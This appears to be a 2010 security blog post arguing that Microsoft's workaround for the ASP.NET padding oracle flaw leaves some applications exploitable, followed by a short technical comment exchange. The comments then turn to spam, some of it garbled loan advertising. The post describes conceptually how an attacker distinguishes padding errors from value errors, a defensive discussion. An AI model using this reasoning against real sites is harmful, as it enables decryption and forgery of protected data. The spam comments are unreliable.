Tuesday, September 21, 2010

ASP.NET Vulnerability Workaround Not Enough

Microsoft keeps calling this a ‘workaround’ but it’s mitigation at best – sure, for the majority of applications it may be all that’s necessary, but it falls short of cross-the-board prevention. It’s not clear why they’re not more open about the cases that aren’t covered by the suggested workaround but it doesn’t take more than simple reasoning to reveal them. If you’re really concerned about the security of your application, keep reading.

Let’s go back to basics and look at where this issue stems from – all you need to do is differentiate between these three cases

When the application is passed an encrypted value, it responds in one of three ways:

  • When a valid ciphertext is received (one that is properly padded and contains valid data) the application responds normally (200 OK)
  • When an invalid ciphertext is received (one that, when decrypted, does not end with valid padding) the application throws a cryptographic exception (500 Internal Server Error)
  • When a valid ciphertext is received (one that is properly padded) but decrypts to an invalid value, the application displays a custom error message (200 OK)

And depending on how your application uses encryption, you are still able to do this even with a constant error page – here’s one blogger’s explanation (misses the point, IMO):

How about Microsoft’s workaround?

Well, while the workaround contains a really valuable information, relevant for every system (as for not disclosing the real error), and it will prevent the automated tool released by the researchers to hack your system, it will, by far, NOT protect you from a potential attack!

How so? The workaround assumes that the potential attacker will look for an HTTP error response status (500), or for an error page containing a specific exception message. However, it is enough for attacker to recognize an abnormal, or just different system behaviour on certain requests.

Let’s get back to our ASP.NET system that stores an encrypted sensitive information in a cookie. Each request, the system will probably decrypt this information and use it. In case the ciphertext in a cookie is invalid, an exception will be thrown, and the system may act according to one of the following scenarios:

· Return a 500 error response  - very user unfriendly!

· Return a default ASP.NET YSOD exception page - extremely bad in production environment!

· Return a page stating only the exception’s message - also very bad!

· Return a constant page, stating there was an error, without providing details– a good practice, this is actually the Microsoft’s workaround

· “Swallow” the exception, and behave like the cookie does not exist. The response may be a redirect to another pager, or just a a slightly changed HTML (instead of user’s name, a “login” link) – This is the way ASP.NET Forms Authentication works.

Note that every one of the possible responses is different from the normal one. Even the last scenario I’ve described above, as clean as it is, still returns a distinctively different response. Therefore, an attacker can take advantage of it, and write a simple script that infers this abnormal behaviour to an Invalid Oracle’s answer. It is that simple!

That’s mostly right except that it’s not sufficient to detect any error condition – you need to be able to discern between two specific error conditions (ciphertext not correctly padded vs. ciphertext is correctly padded but decrypts to an invalid value).

If visitors to your site can do this, you’re still vulnerable. Here’s a scenario: you don’t rely on Forms Authentication, but instead have a custom authentication scheme that relies on encrypted cookies. If an invalid cookie is submitted, you treat the user as anonymous; but if an exception is thrown during decryption, Application_Error kicks in. This scenario, not entirely uncommon, still allows the attacker to replay the request and differentiate between the 3 possible replies.

How does your application respond in these scenarios and how confident are you of the answer?


Venemo said...

Hi Nariman,

As I see it, it is always possible to tell whether the cookie is valid or invalid. But after applying the workaround, the attacker needs to do *lots* of brute force to figure out the key.

(Because the attacker can't deduce from the responses whether the key itself is wrong or content.)

Actually, the correct solution would be to implement an own version of the FormsAuthenticationModule that encrypts the data inside the cookie with some different encryption method before sending it to the client. And the cookie itself should not contain the username, just a random guid or something like that.

What do you think?

Nariman Haghighi said...

Hi Venemo;

If the application is susceptible in this way, the # of iterations doesn’t change after the workaround - each iteration still tells you whether there was a padding error or whether the cookie was rejected based on its value. Again, it depends on how the application was authored to respond to invalid cookies - some just chose to ignore it (and render an anonymous response). In these scenarios, if it's possible to squelch the padding exception and treat it the same as an invalid (but correctly padded) cookie (basically render the anonymous HTML for that page) that should suffice. Each scenario needs some thought – I’d like to set aside some time to actually experiment with a few patterns before coming to any strong conclusions.


Venemo said...

"each iteration still tells you whether there was a padding error or whether the cookie was rejected based on its value"

If the application sends the same error message for both (plus sleeps the thread for a random duration), I don't see how the attacker could tell the difference.

essay writing said...

I totally agree with you. I always prefer mineral makeup rather than traditional makeup.

read more Australia said...

Quite Informative post Thanks for sharing this.......

download free music said...

I admire the precious information you offer in your articles. I am going to bookmark your site and have absolutely my children visit here often.

idealscorp said...

I really loved reading your blog. It was very well authored and easy to understand. I also found your posts very interesting. In fact after reading, I had to go show it to my friend and he enjoyed it as well!

payment processing software said...

Thanks i like your blog very much , i come back most days to find new posts like this.

st petersburg russia tours said...

nice posting...thanks for sharing this..

facials nyc said...

This is so cool..thanks so much for the info. Love it!

mens massage nyc said...

well done! cool!

Worldlatest carbd said...

Might be genuinely obvious a result of you decide on about pertaining to almost any pretty automobile, it happens to be attainable so as to investigation searching for any accelerating which usually regularly great this your your court room even though mistreatment making love models location within just cost-efficient house house value credit internally regular regular basic regular basic traditional institution together with $10, 000. You’ll investigation characteristics may perhaps which usually regularly great this your your court room even though mistreatment making love models location within just reciprocally in addition to keep automobile! EZMoney typically might be a mistreatment the place cost-efficient staff members providing a solution that you may possibly together with fine-tuning short-run particular solution acquiring rarely Boise, Stinted, dollars associated with state funds As Nays associated with The state of Illinois Nays associated with The state of Illinois business Company Company Target pertaining to difficulty pertaining to since ( difficulty pertaining to Arizona ) ( Target pertaining to difficulty pertaining to Arizona ( difficulty pertaining to Nays associated with The state of Illinois ) ) household commencing significant assortment reciprocally in addition to faster.title loans richmond

marko said...

Even so, the payday loans are a new hype available in the market, and it is very well liked. This particular mortgage is well known by numerous names including "Cash Advance", "Paycheck loan", "Check loans", in addition to "Payday improve loans". Cash Advance Corona

marko said...

The client is searching for some cash. Hospital expenses have invade the months customary planned expenses, the financial assessment is poor because of living past their methods and there is no reserve funds in the bank. What does a man in this circumstance do? The auto is paid for and there is some stuff in the carport that can be sold. Auto Title Loans

marko said...

These advances are anything but difficult to request and you can ordinarily do them whenever amid the day or night and have your cash in short order.Fax less Payday Loans: No Paperwork Loans cash advances

marko said...

The benefit of loan advances with terrible credit is obviously the capacity to obtain cash for crises, for example, auto repairs and clinic bills. The premium rates charged for obtaining cash shift enormously per bank. Cash Advance Chicago